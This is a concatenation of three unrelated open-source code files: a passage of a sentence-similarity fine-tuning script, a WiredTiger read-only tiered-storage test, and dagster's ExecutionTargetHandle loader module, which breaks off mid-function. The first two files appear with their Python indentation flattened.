tokenizer = AutoTokenizer.from_pretrained(model_name)
num_epochs = 2
# Create the tokenize function
def tokenize1(df):
return tokenizer(df["sentence1"],padding=True,truncation=True,max_length=max_length)
def tokenize2(df):
return tokenizer(df["sentence2"],padding=True,truncation=True,max_length=max_length)
# Transform in the correct form : ['input_ids1', 'attention_mask1', 'input_ids2', 'attention_mask2','score']
train_encoded = train.map(tokenize1,batched=True,batch_size=None)
train_encoded = train_encoded.rename_column("input_ids","input_ids1")
train_encoded = train_encoded.rename_column("attention_mask","attention_mask1")
train_encoded = train_encoded.map(tokenize2,batched=True,batch_size=None)
train_encoded = train_encoded.rename_column("input_ids","input_ids2")
train_encoded = train_encoded.rename_column("attention_mask","attention_mask2")
train_encoded = train_encoded.remove_columns(["sentence1"])
train_encoded = train_encoded.remove_columns(["sentence2"])
train_encoded = train_encoded.remove_columns(["Old Similarity"])
# Set the correct format
train_encoded.set_format("torch")
# Create the Dataloader
trainloader = DataLoader(train_encoded,shuffle=True,batch_size=batch_size)
# Load the model used as body
body = AutoModel.from_pretrained(model_name,max_length=max_length)
# Create the training model
model = STSBTrainingModel(body=body).to(device)
# Load the model and it
optimizer = AdamW(model.parameters(),lr=learning_rate,weight_decay=weight_decay)
training_steps = num_epochs*len(trainloader)
scheduler = get_constant_schedule(optimizer=optimizer)
# Set up the progress bar
progress_bar = tqdm(range(training_steps))
# Loss keeper
loss_train = []
# Get the loss without training (epoch 0)
tmp_loss = []
for batch in trainloader:
# Batch to GPU
batch = {k: v.to(device) for k, v in batch.items()}
# Predict the batch (no gradients needed)
with torch.no_grad():
loss,_ = model(**batch)
# Append the loss
tmp_loss.append(loss.item())
# Make the loss independant to the batch size
tmp_loss = sum(tmp_loss)/len(trainloader)
# Append the epoch training loss
loss_train.append(tmp_loss)
# Train the model
for epoch in range(num_epochs):
model.train()
tmp_loss = []
for batch in trainloader:
# Clear the gradient
optimizer.zero_grad()
# Batch to GPU
batch = {k: v.to(device) for k, v in batch.items()}
# Predict the batch
loss,_ = model(**batch)
# Compute the gradient
loss.backward()
# Make the step of training
optimizer.step()
scheduler.step()
# Update the progess bar
progress_bar.update(1)
# Add the loss
tmp_loss.append(loss.item())
# Make the loss independant to the batch size
tmp_loss = sum(tmp_loss)/len(trainloader)
# Append the epoch training loss
loss_train.append(tmp_loss)
# Save the trained model with the tokenizer
trainer = Trainer(model=body,tokenizer=tokenizer)
trainer.save_model(model_save)
| TheCricri/TFE_Chatbot_Tifi | CustomFineTuning.py | CustomFineTuning.py | py | 4,735 | python | en | code | 0 | github-code | 36 |
36956009049 | from helper_tiered import TieredConfigMixin, gen_tiered_storage_sources, get_conn_config
from wtscenario import make_scenarios
import fnmatch, os, wttest
class test_tiered17(TieredConfigMixin, wttest.WiredTigerTestCase):
tiered_storage_sources = gen_tiered_storage_sources()
saved_conn = ''
uri = "table:test_tiered"
shutdown = [
('clean', dict(clean=True)),
('unclean', dict(clean=False)),
]
def conn_config(self):
if self.is_tiered_scenario():
self.saved_conn = get_conn_config(self) + ')'
return self.saved_conn
scenarios = make_scenarios(tiered_storage_sources, shutdown)
def get_object_files(self):
object_files = fnmatch.filter(os.listdir('.'), "*.wtobj") + fnmatch.filter(os.listdir('.'), '*.wt')
return object_files
def verify_checkpoint(self):
obj_files_orig = self.get_object_files()
ckpt_cursor = self.session.open_cursor(self.uri, None, 'checkpoint=WiredTigerCheckpoint')
ckpt_cursor.close()
obj_files = self.get_object_files()
# Check that no additional object files have been created after opening the checkpoint.
self.assertTrue(len(obj_files_orig) == len(obj_files))
def populate(self):
# Create and populate a table.
self.session.create(self.uri, "key_format=S,value_format=S")
c = self.session.open_cursor(self.uri)
c["a"] = "a"
c["b"] = "b"
# Do a checkpoint and flush operation.
self.session.checkpoint('flush_tier=(enabled)')
# Add more data but don't do a checkpoint or flush in the unclean shutdown scenario.
if not self.clean:
c["c"] = "c"
c["d"] = "d"
c.close()
def test_open_readonly_conn(self):
self.populate()
self.verify_checkpoint()
obj_files_orig = self.get_object_files()
# Re-open the connection but in readonly mode.
conn_params = 'readonly=true,' + self.saved_conn
self.reopen_conn(config = conn_params)
obj_files = self.get_object_files()
# Check that no additional object files have been created after re-opening the connection.
self.assertTrue(len(obj_files_orig) == len(obj_files))
self.close_conn()
# Check that no additional object files have been created after closing the connection.
obj_files = self.get_object_files()
self.assertTrue(len(obj_files_orig) == len(obj_files))
def test_open_readonly_cursor(self):
self.populate()
obj_files_orig = self.get_object_files()
# Open the database in readonly mode.
self.reopen_conn(config = self.saved_conn)
c = self.session.open_cursor(self.uri, None, "readonly=true")
obj_files = self.get_object_files()
# Check that no additional object files have been created after re-opening the connection.
self.assertTrue(len(obj_files_orig) == len(obj_files))
c.close()
self.close_conn()
# Check that no additional object files have been created after closing the connection.
obj_files = self.get_object_files()
self.assertTrue(len(obj_files_orig) == len(obj_files))
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_tiered17.py | test_tiered17.py | py | 3,276 | python | en | code | 24,670 | github-code | 36 |
495049737 | import imp
import importlib
import inspect
import os
import sys
import weakref
from collections import namedtuple
from enum import Enum
from dagster import check
from dagster.core.definitions.partition import RepositoryPartitionsHandle
from dagster.core.definitions.pipeline import PipelineDefinition
from dagster.core.definitions.repository import RepositoryDefinition
from dagster.core.errors import DagsterInvariantViolationError
from dagster.core.scheduler import SchedulerHandle
from dagster.utils import load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPHEMERAL_NAME = '<<unnamed>>'
class PartitionLoaderEntrypoint(
    namedtuple('_PartitionLoaderEntrypoint', 'module module_name fn_name from_handle')
):
    '''Serializable pointer to a module attribute yielding a RepositoryPartitionsHandle.

    Fields:
        module: The loaded module object containing the target attribute.
        module_name (str): Name of the module.
        fn_name (str): Attribute name in the module; either a RepositoryPartitionsHandle
            instance or a zero-argument callable returning one.
        from_handle (Optional[ExecutionTargetHandle]): Handle this entrypoint was derived
            from, if any.
    '''

    def __new__(cls, module, module_name, fn_name, from_handle=None):
        return super(PartitionLoaderEntrypoint, cls).__new__(
            cls, module, module_name, fn_name, from_handle
        )

    def perform_load(self):
        '''Resolve ``fn_name`` on ``module`` to a RepositoryPartitionsHandle.

        Returns:
            RepositoryPartitionsHandle

        Raises:
            DagsterInvariantViolationError: If the attribute is missing, or is neither a
                RepositoryPartitionsHandle nor a callable returning one.
        '''
        # in the decorator case the attribute will be the actual definition
        if not hasattr(self.module, self.fn_name):
            raise DagsterInvariantViolationError(
                '{name} not found in module {module}.'.format(name=self.fn_name, module=self.module)
            )

        fn_partitions = getattr(self.module, self.fn_name)

        if isinstance(fn_partitions, RepositoryPartitionsHandle):
            inst = fn_partitions
        elif callable(fn_partitions):
            handle = fn_partitions()
            if not isinstance(handle, RepositoryPartitionsHandle):
                raise DagsterInvariantViolationError(
                    '{fn_name} is a function but must return a RepositoryPartitionsHandle.'.format(
                        fn_name=self.fn_name
                    )
                )
            inst = handle
        else:
            raise DagsterInvariantViolationError(
                # BUG FIX: message previously read 'RepositoryPartitionstHandle' (typo).
                '{fn_name} must be a function that returns a RepositoryPartitionsHandle.'.format(
                    fn_name=self.fn_name
                )
            )
        return inst

    @staticmethod
    def from_file_target(python_file, fn_name, from_handle=None):
        '''Build an entrypoint by loading a python file as a module.

        Note: appends the file's directory to sys.path as a side effect so that the
        loaded module can resolve its own sibling imports.
        '''
        file_directory = os.path.dirname(python_file)
        if file_directory not in sys.path:
            sys.path.append(file_directory)
        module_name = os.path.splitext(os.path.basename(python_file))[0]
        module = imp.load_source(module_name, python_file)
        return PartitionLoaderEntrypoint(module, module_name, fn_name, from_handle)

    @staticmethod
    def from_module_target(module_name, fn_name, from_handle=None):
        '''Build an entrypoint by importing a module by name.'''
        module = importlib.import_module(module_name)
        return PartitionLoaderEntrypoint(module, module_name, fn_name, from_handle)

    @staticmethod
    def from_yaml(file_path, from_handle=None):
        '''Build an entrypoint from the `partitions` section of a repository yaml file.

        Returns None if the config has no `partitions` key. A file target is rebased
        relative to the yaml file's own directory before loading.
        '''
        check.str_param(file_path, 'file_path')
        config = load_yaml_from_path(file_path)
        if not config.get('partitions'):
            return None
        partitions = check.dict_elem(config, 'partitions')
        module_name = check.opt_str_elem(partitions, 'module')
        file_name = check.opt_str_elem(partitions, 'file')
        fn_name = check.str_elem(partitions, 'fn')

        if module_name:
            return PartitionLoaderEntrypoint.from_module_target(module_name, fn_name, from_handle)
        else:
            # rebase file in config off of the path in the config file
            file_name = os.path.join(os.path.dirname(os.path.abspath(file_path)), file_name)
            return PartitionLoaderEntrypoint.from_file_target(file_name, fn_name, from_handle)
class SchedulerLoaderEntrypoint(
    namedtuple('_SchedulerLoaderEntrypoint', 'module module_name fn_name from_handle')
):
    '''Serializable pointer to a module attribute that builds a SchedulerHandle.

    Fields:
        module: The loaded module object containing the target attribute.
        module_name: Name of the module.
        fn_name: Attribute name in the module; expected to be a callable accepting
            ``artifacts_dir`` and ``repository_name`` keyword arguments and returning
            a SchedulerHandle.
        from_handle: The ExecutionTargetHandle this entrypoint was derived from; used
            to resolve the repository name at load time.
    '''

    def __new__(cls, module, module_name, fn_name, from_handle=None):
        return super(SchedulerLoaderEntrypoint, cls).__new__(
            cls, module, module_name, fn_name, from_handle
        )

    def perform_load(self, artifacts_dir):
        '''Resolve ``fn_name`` on ``module`` and invoke it to build a SchedulerHandle.

        Args:
            artifacts_dir (str): Directory passed through to the scheduler function.

        Raises:
            DagsterInvariantViolationError: If the attribute is missing, is not
                callable, or does not return a SchedulerHandle.
        '''
        artifacts_dir = check.str_param(artifacts_dir, 'artifacts_dir')
        # NOTE(review): assumes from_handle was supplied at construction -- a None
        # from_handle raises AttributeError here. Confirm all construction paths set it.
        repository_name = self.from_handle.build_repository_definition().name

        # in the decorator case the attribute will be the actual definition
        if not hasattr(self.module, self.fn_name):
            raise DagsterInvariantViolationError(
                '{name} not found in module {module}.'.format(name=self.fn_name, module=self.module)
            )

        fn_scheduler = getattr(self.module, self.fn_name)

        if callable(fn_scheduler):
            scheduler = fn_scheduler(artifacts_dir=artifacts_dir, repository_name=repository_name)
            if not isinstance(scheduler, SchedulerHandle):
                raise DagsterInvariantViolationError(
                    '{fn_name} is a function but must return a SchedulerHandle.'.format(
                        fn_name=self.fn_name
                    )
                )
            inst = scheduler
        else:
            raise DagsterInvariantViolationError(
                '{fn_name} must be a function that returns a SchedulerHandle.'.format(
                    fn_name=self.fn_name
                )
            )
        return inst

    @staticmethod
    def from_file_target(python_file, fn_name, from_handle=None):
        '''Build an entrypoint by loading a python file as a module.

        Note: appends the file's directory to sys.path as a side effect.
        '''
        file_directory = os.path.dirname(python_file)
        if file_directory not in sys.path:
            sys.path.append(file_directory)
        module_name = os.path.splitext(os.path.basename(python_file))[0]
        module = imp.load_source(module_name, python_file)
        return SchedulerLoaderEntrypoint(module, module_name, fn_name, from_handle)

    @staticmethod
    def from_module_target(module_name, fn_name, from_handle=None):
        '''Build an entrypoint by importing a module by name.'''
        module = importlib.import_module(module_name)
        return SchedulerLoaderEntrypoint(module, module_name, fn_name, from_handle)

    @staticmethod
    def from_yaml(file_path, from_handle=None):
        '''Build an entrypoint from the `scheduler` section of a repository yaml file.

        Returns None if the config has no `scheduler` key. A file target is rebased
        relative to the yaml file's own directory before loading.
        '''
        check.str_param(file_path, 'file_path')
        config = load_yaml_from_path(file_path)
        if not config.get('scheduler'):
            return None
        scheduler = check.dict_elem(config, 'scheduler')
        module_name = check.opt_str_elem(scheduler, 'module')
        file_name = check.opt_str_elem(scheduler, 'file')
        fn_name = check.str_elem(scheduler, 'fn')

        if module_name:
            return SchedulerLoaderEntrypoint.from_module_target(module_name, fn_name, from_handle)
        else:
            # rebase file in config off of the path in the config file
            file_name = os.path.join(os.path.dirname(os.path.abspath(file_path)), file_name)
            return SchedulerLoaderEntrypoint.from_file_target(file_name, fn_name, from_handle)
class LoaderEntrypoint(namedtuple('_LoaderEntrypoint', 'module module_name fn_name from_handle')):
    '''Serializable pointer to a module attribute yielding a RepositoryDefinition or
    PipelineDefinition.

    Fields:
        module: The loaded module object containing the target attribute.
        module_name: Name of the module.
        fn_name: Attribute name in the module; a PipelineDefinition (the @pipeline
            decorator case) or a zero-argument callable returning a PipelineDefinition
            or RepositoryDefinition.
        from_handle: The ExecutionTargetHandle this entrypoint was derived from, if any;
            when set, loaded definitions are recorded in the handle cache.
    '''

    def __new__(cls, module, module_name, fn_name, from_handle=None):
        return super(LoaderEntrypoint, cls).__new__(cls, module, module_name, fn_name, from_handle)

    def perform_load(self):
        '''Resolve ``fn_name`` on ``module`` to a definition object.

        Returns:
            Union[RepositoryDefinition, PipelineDefinition]

        Raises:
            DagsterInvariantViolationError: If the attribute is missing, or is neither
                a PipelineDefinition nor a callable returning a valid definition.
        '''
        # in the decorator case the attribute will be the actual definition
        if not hasattr(self.module, self.fn_name):
            raise DagsterInvariantViolationError(
                '{name} not found in module {module}.'.format(name=self.fn_name, module=self.module)
            )

        fn_repo_or_pipeline = getattr(self.module, self.fn_name)

        # This is the @pipeline case
        if isinstance(fn_repo_or_pipeline, PipelineDefinition):
            inst = fn_repo_or_pipeline
        # This is the define_pipeline() or define_repo() case
        elif callable(fn_repo_or_pipeline):
            repo_or_pipeline = fn_repo_or_pipeline()

            if not isinstance(repo_or_pipeline, (RepositoryDefinition, PipelineDefinition)):
                raise DagsterInvariantViolationError(
                    '{fn_name} is a function but must return a PipelineDefinition '
                    'or a RepositoryDefinition, or be decorated with @pipeline.'.format(
                        fn_name=self.fn_name
                    )
                )
            inst = repo_or_pipeline
        else:
            raise DagsterInvariantViolationError(
                '{fn_name} must be a function that returns a PipelineDefinition '
                'or a RepositoryDefinition, or a function decorated with @pipeline.'.format(
                    fn_name=self.fn_name
                )
            )

        # Record the provenance of the loaded definition so it can be re-serialized
        # across process boundaries later (see ExecutionTargetHandle.cache_handle).
        if self.from_handle:
            return ExecutionTargetHandle.cache_handle(inst, self.from_handle)

        return inst

    @staticmethod
    def from_file_target(python_file, fn_name, from_handle=None):
        '''Build an entrypoint by loading a python file as a module.

        Note: appends the file's directory to sys.path as a side effect.
        '''
        file_directory = os.path.dirname(python_file)
        if file_directory not in sys.path:
            sys.path.append(file_directory)
        module_name = os.path.splitext(os.path.basename(python_file))[0]
        module = imp.load_source(module_name, python_file)
        return LoaderEntrypoint(module, module_name, fn_name, from_handle)

    @staticmethod
    def from_module_target(module_name, fn_name, from_handle=None):
        '''Build an entrypoint by importing a module by name.'''
        module = importlib.import_module(module_name)
        return LoaderEntrypoint(module, module_name, fn_name, from_handle)

    @staticmethod
    def from_yaml(file_path, from_handle=None):
        '''Build an entrypoint from the `repository` section of a repository yaml file.

        Unlike the scheduler/partitions variants, the `repository` section is required.
        A file target is rebased relative to the yaml file's own directory.
        '''
        check.str_param(file_path, 'file_path')
        config = load_yaml_from_path(file_path)
        repository_config = check.dict_elem(config, 'repository')
        module_name = check.opt_str_elem(repository_config, 'module')
        file_name = check.opt_str_elem(repository_config, 'file')
        fn_name = check.str_elem(repository_config, 'fn')

        if module_name:
            return LoaderEntrypoint.from_module_target(module_name, fn_name, from_handle)
        else:
            # rebase file in config off of the path in the config file
            file_name = os.path.join(os.path.dirname(os.path.abspath(file_path)), file_name)
            return LoaderEntrypoint.from_file_target(file_name, fn_name, from_handle)
class ExecutionTargetHandleCacheEntry(
    namedtuple('_ExecutionTargetHandleCacheEntry', 'handle solid_subset')
):
    '''Pairs the ExecutionTargetHandle used to construct a definition with the optional
    solid subset used to build a sub-pipeline from it. Stored as the value type of
    ExecutionTargetHandle.__cache__.
    '''

    def __new__(cls, handle, solid_subset=None):
        # handle is required (check raises on None); solid_subset may be None or a
        # list of solid name strings.
        check.inst_param(handle, 'handle', ExecutionTargetHandle)
        check.opt_list_param(solid_subset, 'solid_subset', of_type=str)
        return super(ExecutionTargetHandleCacheEntry, cls).__new__(cls, handle, solid_subset)
class ExecutionTargetHandle(object):
'''ExecutionTargetHandle represents an immutable, serializable reference to a Dagster
RepositoryDefinition or PipelineDefinition, to support dynamically loading these in various
contexts (e.g. across process boundaries).
    This class must remain pickle-serializable to ensure multiprocessing compatibility, and is
    one of the primary reasons that we pass this around vs. an instantiated
    RepositoryDefinition/PipelineDefinition object.
### Creation
ExecutionTargetHandles can be created via the staticmethod constructors below.
- for_repo_fn
- for_repo_yaml
- for_repo_python_file
- for_repo_module
- for_pipeline_fn
- for_pipeline_python_file
- for_pipeline_module
Also, the following constructors are provided to support construction from CLI tools in
dagster.cli.load_handle:
- handle_for_repo_cli_args
- handle_for_pipeline_cli_args
Since an ExecutionTargetHandle can reference either a RepositoryDefinition or a fully-qualified
pipeline, it provides a property `is_resolved_to_pipeline` which identifies whether it is fully-
qualified to a pipeline reference.
For repository-based handles, you can use the `with_pipeline_name(pipeline_name)` method on a
repository handle to construct and return a new fully-qualified pipeline handle.
### Usage
Handle objects support the following methods to construct `*Definition` objects:
- handle.build_repository_definition() => RepositoryDefinition
- handle.build_pipeline_definition() => PipelineDefinition
These are intended to support reconstructing definitions from their serialized representations
provided by this object wherever needed during execution.
The first is supported on all handles; the second requires a fully-qualified pipeline handle.
For more advanced usage, you can also construct an entrypoint object yourself with:
- handle.entrypoint() => LoaderEntrypoint
This should not be necessary in common usage.
'''
__cache__ = weakref.WeakKeyDictionary()
'''The cache is used to cache handles used to create PipelineDefinition and
RepositoryDefinition objects, so the handles can be passed across serialization boundaries (as
for dagstermill) by solid compute logic.'''
    @classmethod
    def get_handle(cls, repo_or_pipeline):
        '''Get the handle and, optionally, solid subset used to construct a repo or (sub-)pipeline.

        Returns: Union[ExecutionTargetHandleCacheEntry, (None, None)]
        '''
        check.inst_param(
            repo_or_pipeline, 'repo_or_pipeline', (RepositoryDefinition, PipelineDefinition)
        )
        # Fall back to a (None, None) pair so callers can always unpack two values,
        # whether or not the definition was recorded via cache_handle.
        return cls.__cache__.get(repo_or_pipeline) or (None, None)
    @classmethod
    def cache_handle(cls, repo_or_pipeline_def, handle=None, solid_names=None):
        '''Record a pipeline or repository in the cache.

        Args:
            repo_or_pipeline_def (Union[RepositoryDefinition, PipelineDefinition]): The repo or
                pipeline definition for which to cache the handle.

        Kwargs:
            handle (ExecutionTargetHandle): The handle to cache.
            solid_names (Optional[List[str]]): The solid names constituting the constructed
                sub-pipeline, if any; arg should be as for
                dagster.core.definitions.pipeline.build_sub_pipeline.

        Returns:
            The ``repo_or_pipeline_def`` passed in, so callers can cache-and-return in
            one expression.
        '''
        check.inst_param(
            repo_or_pipeline_def, 'repo_or_pipeline_def', (RepositoryDefinition, PipelineDefinition)
        )
        # NOTE(review): despite the None default, handle is effectively required --
        # check.inst_param raises if it is None. Confirm the default is vestigial.
        check.inst_param(handle, 'handle', ExecutionTargetHandle)
        check.opt_list_param(solid_names, 'solid_names', of_type=str)
        cls.__cache__[repo_or_pipeline_def] = ExecutionTargetHandleCacheEntry(handle, solid_names)
        return repo_or_pipeline_def
    @staticmethod
    def for_pipeline_fn(fn):
        '''This builder is a bit magical, but it inspects its caller to determine how to build a
        ExecutionTargetHandle object via python_file and fn_name.

        This will work since fn_name is ensured to be in scope in the python_file caller's scope.
        '''
        check.callable_param(fn, 'fn')
        # Stack inspection recovers the caller's file so the handle can re-import it later.
        return ExecutionTargetHandle.for_pipeline_python_file(
            python_file=_get_python_file_from_previous_stack_frame(), fn_name=fn.__name__
        )

    @staticmethod
    def for_repo_fn(fn):
        '''This builder is a bit magical, but it inspects its caller to determine how to build a
        ExecutionTargetHandle object via python_file and fn_name.

        This will work since fn_name is ensured to be in scope in the python_file caller's scope.
        '''
        check.callable_param(fn, 'fn')
        # Stack inspection recovers the caller's file so the handle can re-import it later.
        return ExecutionTargetHandle.for_repo_python_file(
            python_file=_get_python_file_from_previous_stack_frame(), fn_name=fn.__name__
        )

    @staticmethod
    def for_repo_yaml(repository_yaml):
        '''Builds an ExecutionTargetHandle for a repository.yml file.'''
        # Absolutize the path so the handle remains valid across cwd changes / processes.
        return ExecutionTargetHandle(
            _ExecutionTargetHandleData(repository_yaml=os.path.abspath(repository_yaml)),
            _ExecutionTargetMode.REPOSITORY,
        )

    @staticmethod
    def for_repo_python_file(python_file, fn_name):
        '''Builds an ExecutionTargetHandle for a repository python file and function which is
        expected to return a RepositoryDefinition instance.
        '''
        return ExecutionTargetHandle(
            _ExecutionTargetHandleData(python_file=python_file, fn_name=fn_name),
            _ExecutionTargetMode.REPOSITORY,
        )

    @staticmethod
    def for_repo_module(module_name, fn_name):
        '''Builds an ExecutionTargetHandle for a repository module and function which is expected
        to return a RepositoryDefinition instance.
        '''
        return ExecutionTargetHandle(
            _ExecutionTargetHandleData(module_name=module_name, fn_name=fn_name),
            _ExecutionTargetMode.REPOSITORY,
        )

    @staticmethod
    def for_pipeline_python_file(python_file, fn_name):
        '''Builds an ExecutionTargetHandle for a pipeline python file and function which is expected
        to return a PipelineDefinition instance.
        '''
        return ExecutionTargetHandle(
            _ExecutionTargetHandleData(python_file=python_file, fn_name=fn_name),
            _ExecutionTargetMode.PIPELINE,
            is_resolved_to_pipeline=True,
        )

    @staticmethod
    def for_pipeline_module(module_name, fn_name):
        '''Builds an ExecutionTargetHandle for a pipeline python module and function which is
        expected to return a PipelineDefinition instance.
        '''
        return ExecutionTargetHandle(
            _ExecutionTargetHandleData(module_name=module_name, fn_name=fn_name),
            _ExecutionTargetMode.PIPELINE,
            is_resolved_to_pipeline=True,
        )
    @staticmethod
    def from_dict(handle_dict):
        '''Rehydrate an ExecutionTargetHandle from the plain dict produced by to_dict.'''
        return ExecutionTargetHandle(
            data=_ExecutionTargetHandleData(**handle_dict['data']),
            # mode is stored as the enum member's name string; look it up by attribute.
            mode=getattr(_ExecutionTargetMode, handle_dict['mode']),
            is_resolved_to_pipeline=handle_dict['is_resolved_to_pipeline'],
        )
def to_dict(self):
return {
'data': self.data._asdict(),
'mode': self.mode.name,
'is_resolved_to_pipeline': self.is_resolved_to_pipeline,
}
    def with_pipeline_name(self, pipeline_name):
        '''Returns a new ExecutionTargetHandle that references the pipeline "pipeline_name" within
        the repository.

        Idempotent when this handle already names the same pipeline; raises (via
        check.invariant) if it already names a different one.
        '''
        # Fast path: re-qualifying with the same name returns self unchanged.
        if self.is_resolved_to_pipeline and self.data.pipeline_name == pipeline_name:
            return self

        check.invariant(
            not (self.is_resolved_to_pipeline and self.data.pipeline_name is not None),
            '''ExecutionTargetHandle already references a pipeline named {pipeline_name}, cannot
            change to {new_pipeline_name}.'''.format(
                pipeline_name=self.data.pipeline_name, new_pipeline_name=pipeline_name
            ),
        )
        # Build a new handle rather than mutating; handles are treated as immutable.
        data = self.data._replace(pipeline_name=pipeline_name)
        return ExecutionTargetHandle(
            data, mode=_ExecutionTargetMode.PIPELINE, is_resolved_to_pipeline=True
        )
def build_scheduler_handle(self, artifacts_dir):
# Cannot create a scheduler handle if the target mode is not a repository
if self.mode != _ExecutionTargetMode.REPOSITORY:
return None
entrypoint = self.scheduler_handle_entrypoint
# entrypoint will be None if the repository yaml file does not define a scheduler entrypoint
if not entrypoint:
return None
return self.scheduler_handle_entrypoint.perform_load(artifacts_dir)
    def build_partitions_handle(self):
        '''Load the partitions handle declared in the repository yaml, or None if this
        handle does not target a repository or no partition entrypoint is defined.
        '''
        if self.mode != _ExecutionTargetMode.REPOSITORY:
            return None
        entrypoint = self.partition_handle_entrypoint
        if not entrypoint:
            return None
        return self.partition_handle_entrypoint.perform_load()
    def build_repository_definition(self):
        '''Rehydrates a RepositoryDefinition from an ExecutionTargetHandle object.
        If this ExecutionTargetHandle points to a pipeline, we create an ephemeral repository to
        wrap the pipeline and return it.
        '''
        obj = self.entrypoint.perform_load()
        if self.mode == _ExecutionTargetMode.REPOSITORY:
            # User passed in a function that returns a pipeline definition, not a repository. See:
            # https://github.com/dagster-io/dagster/issues/1439
            if isinstance(obj, PipelineDefinition):
                return ExecutionTargetHandle.cache_handle(
                    RepositoryDefinition(name=EPHEMERAL_NAME, pipeline_defs=[obj]),
                    *ExecutionTargetHandle.get_handle(obj)
                )
            return ExecutionTargetHandle.cache_handle(check.inst(obj, RepositoryDefinition), self)
        elif self.mode == _ExecutionTargetMode.PIPELINE:
            # This handle may have originally targeted a repository and then been qualified with
            # with_pipeline_name()
            if isinstance(obj, RepositoryDefinition):
                return ExecutionTargetHandle.cache_handle(
                    obj, *ExecutionTargetHandle.get_handle(obj)
                )
            # Bare pipeline: wrap it in an ephemeral single-pipeline repository.
            return ExecutionTargetHandle.cache_handle(
                RepositoryDefinition(name=EPHEMERAL_NAME, pipeline_defs=[obj]),
                *ExecutionTargetHandle.get_handle(obj)
            )
        else:
            check.failed('Unhandled mode {mode}'.format(mode=self.mode))
    def build_pipeline_definition(self):
        '''Rehydrates a PipelineDefinition from an ExecutionTargetHandle object.
        '''
        if self.mode == _ExecutionTargetMode.REPOSITORY:
            # A repository handle has no pipeline selected yet; callers must qualify it first.
            raise DagsterInvariantViolationError(
                'Cannot construct a pipeline from a repository-based ExecutionTargetHandle without'
                ' a pipeline name. Use with_pipeline_name() to construct a pipeline'
                ' ExecutionTargetHandle.'
            )
        elif self.mode == _ExecutionTargetMode.PIPELINE:
            obj = self.entrypoint.perform_load()
            if isinstance(obj, PipelineDefinition):
                return ExecutionTargetHandle.cache_handle(obj, self)
            else:
                # Loaded object is a repository; select the named pipeline from it.
                return ExecutionTargetHandle.cache_handle(
                    obj.get_pipeline(self.data.pipeline_name), self
                )
        else:
            check.failed('Unhandled mode {mode}'.format(mode=self.mode))
    @property
    def partition_handle_entrypoint(self):
        '''Entrypoint used to load partition definitions (repository-yaml handles only).'''
        return self.data.get_partition_entrypoint(from_handle=self)
    @property
    def scheduler_handle_entrypoint(self):
        '''Entrypoint used to load the scheduler (repository-yaml handles only).'''
        return self.data.get_scheduler_entrypoint(from_handle=self)
@property
def entrypoint(self):
if self.mode == _ExecutionTargetMode.REPOSITORY:
return self.data.get_repository_entrypoint(from_handle=self)
elif self.mode == _ExecutionTargetMode.PIPELINE:
return self.data.get_pipeline_entrypoint(from_handle=self)
else:
check.failed('Unhandled mode {mode}'.format(mode=self.mode))
    def __init__(self, data, mode, is_resolved_to_pipeline=False):
        '''Not intended to be invoked directly. Use one of the factory functions above.
        '''
        self.data = check.inst_param(data, 'data', _ExecutionTargetHandleData)
        self.mode = check.inst_param(mode, 'mode', _ExecutionTargetMode)
        # By default, this only resolves to a repository
        self.is_resolved_to_pipeline = is_resolved_to_pipeline
def _get_python_file_from_previous_stack_frame():
    '''inspect.stack() lets us introspect the call stack; inspect.stack()[1] is the previous
    stack frame.
    In Python < 3.5, this is just a tuple, of which the python file of the previous frame is the 1st
    element.
    In Python 3.5+, this is a FrameInfo namedtuple instance; the python file of the previous frame
    remains the 1st element.
    '''
    # Since this is now a function in this file, we need to go back two hops to find the
    # callsite file.
    previous_stack_frame = inspect.stack()[2]
    # See: https://docs.python.org/3/library/inspect.html
    if sys.version_info.major == 3 and sys.version_info.minor >= 5:
        check.inst(previous_stack_frame, inspect.FrameInfo)
    else:
        check.inst(previous_stack_frame, tuple)
    # Index 1 is the filename in both the tuple and FrameInfo representations.
    python_file = previous_stack_frame[1]
    return os.path.abspath(python_file)
class _ExecutionTargetMode(Enum):
    '''Discriminates whether a handle targets a single pipeline or a whole repository.'''
    PIPELINE = 1
    REPOSITORY = 2
class _ExecutionTargetHandleData(
    namedtuple(
        '_ExecutionTargetHandleData',
        'repository_yaml module_name python_file fn_name pipeline_name',
    )
):
    '''Immutable payload of an ExecutionTargetHandle: exactly one loading strategy
    (yaml file, module+function, or file+function), plus an optional pipeline name.
    '''
    def __new__(
        cls,
        repository_yaml=None,
        module_name=None,
        python_file=None,
        fn_name=None,
        pipeline_name=None,
    ):
        return super(_ExecutionTargetHandleData, cls).__new__(
            cls,
            repository_yaml=check.opt_str_param(repository_yaml, 'repository_yaml'),
            module_name=check.opt_str_param(module_name, 'module_name'),
            python_file=check.opt_str_param(python_file, 'python_file'),
            fn_name=check.opt_str_param(fn_name, 'fn_name'),
            pipeline_name=check.opt_str_param(pipeline_name, 'pipeline_name'),
        )
    def get_partition_entrypoint(self, from_handle=None):
        '''Partition loader entrypoint; implicitly None unless backed by a repository yaml.'''
        if self.repository_yaml:
            return PartitionLoaderEntrypoint.from_yaml(
                self.repository_yaml, from_handle=from_handle
            )
    def get_scheduler_entrypoint(self, from_handle=None):
        '''Scheduler loader entrypoint; implicitly None unless backed by a repository yaml.'''
        if self.repository_yaml:
            return SchedulerLoaderEntrypoint.from_yaml(
                self.repository_yaml, from_handle=from_handle
            )
    def get_repository_entrypoint(self, from_handle=None):
        '''Build a LoaderEntrypoint for a repository target, preferring yaml, then
        module+fn, then file+fn. Raises if no valid combination is set.
        '''
        if self.repository_yaml:
            return LoaderEntrypoint.from_yaml(self.repository_yaml, from_handle=from_handle)
        elif self.module_name and self.fn_name:
            return LoaderEntrypoint.from_module_target(
                module_name=self.module_name, fn_name=self.fn_name, from_handle=from_handle
            )
        elif self.python_file and self.fn_name:
            return LoaderEntrypoint.from_file_target(
                python_file=self.python_file, fn_name=self.fn_name, from_handle=from_handle
            )
        else:
            raise DagsterInvariantViolationError(
                (
                    'You have attempted to load a repository with an invalid '
                    'combination of properties. repository_yaml {repository_yaml} '
                    'module_name {module_name} python_file {python_file} '
                    'fn_name {fn_name}.'
                ).format(
                    repository_yaml=self.repository_yaml,
                    module_name=self.module_name,
                    fn_name=self.fn_name,
                    python_file=self.python_file,
                )
            )
    def get_pipeline_entrypoint(self, from_handle=None):
        '''Build a LoaderEntrypoint for a pipeline target, preferring file+fn, then
